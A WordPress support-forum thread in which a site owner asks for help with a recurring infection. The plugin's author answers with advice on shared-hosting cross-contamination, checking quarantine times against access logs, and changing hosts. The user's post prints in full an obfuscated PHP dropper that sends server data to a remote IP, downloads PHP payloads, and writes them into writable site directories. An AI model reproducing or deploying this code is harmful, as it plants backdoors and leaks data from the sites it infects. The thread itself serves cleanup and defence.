• Resolved shayeryan

    (@shayeryan)


    Great plugin, it has detected and helped me remove the malicious code from my site…however, the infection keeps coming back, even after hardening my site.

    How do I use the plugin to identify what the threat actually is? This might help me identify where the hole in my security is.

    Steps I’ve performed:
    -Reinstalling WP Core
    -Reinstalling all Plugins
    -Reinstalling theme
    -WordFence scan and deleting or repairing infected files
    -Changing passwords for WP and database
    -Looking for hidden accounts in the database
    -Changing FTP passwords
    -Removing unauthorized FTP accounts

    Here is the malicious code I’m finding in multiple files:
    <?php if(!isset($incode)){$vl='h';$serverid='0bdf5b6877cf16717e02642fc9fc250d';$server_addr='219.95.83.119';function o0($oo0o,$oo,$oo0,$oO,$oOo,$ooooO){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$o000=stream_context_create(array($ooooO=>array('method'=>'POST','timeout'=>$oOo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oO=='yes'){$oo0o=$oo0o.'&type=fopen';}$ooo=@file_get_contents($oo0o,false,$o000);}elseif(in_array('curl',get_loaded_extensions())){if($oO=='yes'){$oo0o=$oo0o.'&type=curl';}$oo00O=curl_init();curl_setopt($oo00O,CURLOPT_URL,$oo0o);curl_setopt($oo00O,CURLOPT_HEADER,false);curl_setopt($oo00O,CURLOPT_RETURNTRANSFER,true);curl_setopt($oo00O,CURLOPT_TIMEOUT,$oOo);curl_setopt($oo00O,CURLOPT_USERAGENT,$o0oo0);if($ooooO=='https'){curl_setopt($oo00O,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oo00O,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oo00O,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oo00O,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooo=@curl_exec($oo00O);curl_close($oo00O);}else{if($oO=='yes'){$oo0=$oo0.'&type=socks';}if($ooooO=='https'){$ooO=fsockopen('ssl://'.$oo,443,$o0Ooo,$oO0,$oOo);}else{$ooO=fsockopen($oo,80,$o0Ooo,$oO0,$oOo);}if($ooO){stream_set_timeout($ooO,$oOo);$oO0Oo=http_build_query($_SERVER);$o0O='POST '.$oo0.' 
HTTP/1.0'."\r\n";$o0O.='Host: '.$oo."\r\n";$o0O.='User-Agent: '.$o0oo0."\r\n";$o0O.='Content-Type: application/x-www-form-urlencoded'."\r\n";$o0O.='Content-Length: '.strlen($oO0Oo)."\r\n\r\n";fwrite($ooO,$o0O);fwrite($ooO,$oO0Oo);$oooO='';while(!feof($ooO)){$oooO.=fgets($ooO,4096);}fclose($ooO);list($ooOO,$oO0oo)=@preg_split("/\R\R/",$oooO,2);$ooo=$oO0oo;}}return$ooo;}function ooO($o0OO){$o0oo[0]=(int)($o0OO/256/256/256);$o0oo[1]=(int)(($o0OO-$o0oo[0]*256*256*256)/256/256);$o0oo[2]=(int)(($o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256)/256);$o0oo[3]=$o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256-$o0oo[2]*256;return''.$o0oo[0].".".$o0oo[1].".".$o0oo[2].".".$o0oo[3];}function o0O00($o0o0){$o0Oo=array();$o0Oo[]=$o0o0;foreach(scandir($o0o0) as$oo00){if($oo00=='.'||$oo00=='..'){continue;}$oOO0=$o0o0.DIRECTORY_SEPARATOR.$oo00;if(is_dir($oOO0)){$o0Oo[]=$oOO0;$o0Oo=array_merge($o0Oo,o0O00($oOO0));}}return$o0Oo;}$oOoo=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oo=ooO('3104709758');$oo0='/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0o='https://'.$oo.'/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0OO=o0($oo0o,$oo,$oo0,$oO='no',$oOo='30',$ooooO='http');if($oo0OO!='havedoor|havedonor'){$o0=$_SERVER['HTTP_HOST'];$oo0O=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oO00=$_SERVER['DOCUMENT_ROOT'];chdir($oO00);$o0Oo=o0O00($oO00);$o0Oo=array_unique($o0Oo);foreach($o0Oo as$oo00){if(is_dir($oo00)&&is_writable($oo00)){$o0O0o=explode(DIRECTORY_SEPARATOR,$oo00);$oOo0=count($o0O0o);$oOoOo[]=$oOo0.'|'.$oo00;}}$oOo0=0;foreach($oOoOo 
as$ooo0){if(count($oOoOo)>1&&(strstr($ooo0,'/wp-admin')||strstr($ooo0,'/cgi-bin'))){unset($oOoOo[$oOo0]);}$oOo0++;}if(!is_writable($oO00)){natsort($oOoOo);$oOoOo=array_values($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];}else{$ooo0=$oO00;}chdir($ooo0);if(stristr($oo0OO,'nodoor')){$oo0o='https://'.$oo.'/get.php?vl='.$vl.'&update&needfilename';$oo0='/get.php?vl='.$vl.'&update&needfilename';$o0o=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');$oo0oO=explode('|||||',$o0o);$oOoOO=$oo0oO[0].'.php';$o00o=$oo0oO[1];file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$o00o);$o00=str_replace($oO00,'',$ooo0);if($_SERVER['SERVER_PORT']=='443'){$ooooO='https';}else{$ooooO='http';}$oo0o=$ooooO.'://'.$o0.$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$oo0=$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$ooOoO=o0($oo0o,$o0,$oo0,$oO='no',$oOo='55',$ooooO);}elseif(stristr($oo0OO,'needtoloadsomefiles')){shuffle($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];$o00=str_replace($oO00,'',$ooo0);$o0oO='stuvwxyz';$oOoOO=str_shuffle($o0oO).'.php';$ooOo=urlencode($ooooO.'://'.$o0.$o00.'/'.$oOoOO);$oo0o='https://'.$oo.'/get.php?bdr&url='.$ooOo;$oo0='/get.php?bdr&url='.$ooOo;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='20',$ooooO='http');file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$ooo);}elseif(stristr($oo0OO,'needtoloadclient')){$oo0o='https://'.$oo.'/get.php?getclient&domain='.$oo0O;$oo0='/get.php?getclient&domain='.$oo0O;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');if($ooo!='noclient'){$oOO0o=explode('::::',$ooo);$ooO0=$oOO0o[0];$ooOOO=$oOO0o[1];if(file_exists($ooO0)){if(!is_writable($ooO0)){@chmod($ooO0,'0644');@file_put_contents($ooO0,$ooOOO);if(!is_writable($ooO0)){@unlink($ooO0);@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}}elseif($oo0OO=='needtowait'){}if(stristr($oo0OO,'nodonor')){}}$incode=1;}?><?php

  • Plugin Author Eli

    (@scheeeli)

    That code that you keep finding is already in my latest definitions so my plugin is removing it whenever you run the Complete Scan. The problem you are still facing is that this infection keeps coming back no matter how many times you remove it, is that about right?

    I see that you have taken some very thorough steps to secure your site, but one area that you have not covered here is your hosting environment. I am guessing that this site is on a shared hosting account and the biggest security vulnerability on any shared hosting server is cross-contamination from other infected sites. No matter how good a job you do locking down the security on your site it only takes one back-door on any other site on that server to leave you wide open to another infection. Once a malicious script has been planted on any site that has access to the same file-system that your site is hosted on then that script can copy itself to your site and all the other sites on that server. In actual practice they usually don’t infect every single site on the server because then the hosting provider would have to take responsibility for the breach and clean it all up with some enterprise malware solution, so these kinds of scripts usually just focus on a smaller subset of the sites that they feel they can get away with, and we may never know why they have selected your site as one of the sites that they are picking on.

    It is also likely that they have planted other back-doors on your site so that they can get back into the server through you if the other security hole gets plugged up. For this reason it is important to review your access_log files after each scan that reveals more infected files. You can get the exact infection time of each of the files that you clean using my plugin by reviewing the Anti-Malware Quarantine after the automatic fix is performed. The Quarantine log times are in GMT and your access_log files might be in the server’s local time-zone, so make sure to correct for that when you are looking up those times in your logs. If you find any suspicious URLs being called up on your site at the exact time of the latest infections then you may be able to find more scripts that are responsible for spreading this threat around.

    If you cannot find anything else on your site and these infections keep coming back despite all your work to secure your site then you might need to look into moving your site to a more secure hosting environment.

    Please let me know if you find anything new or if you need any more help.

    Aloha, Eli
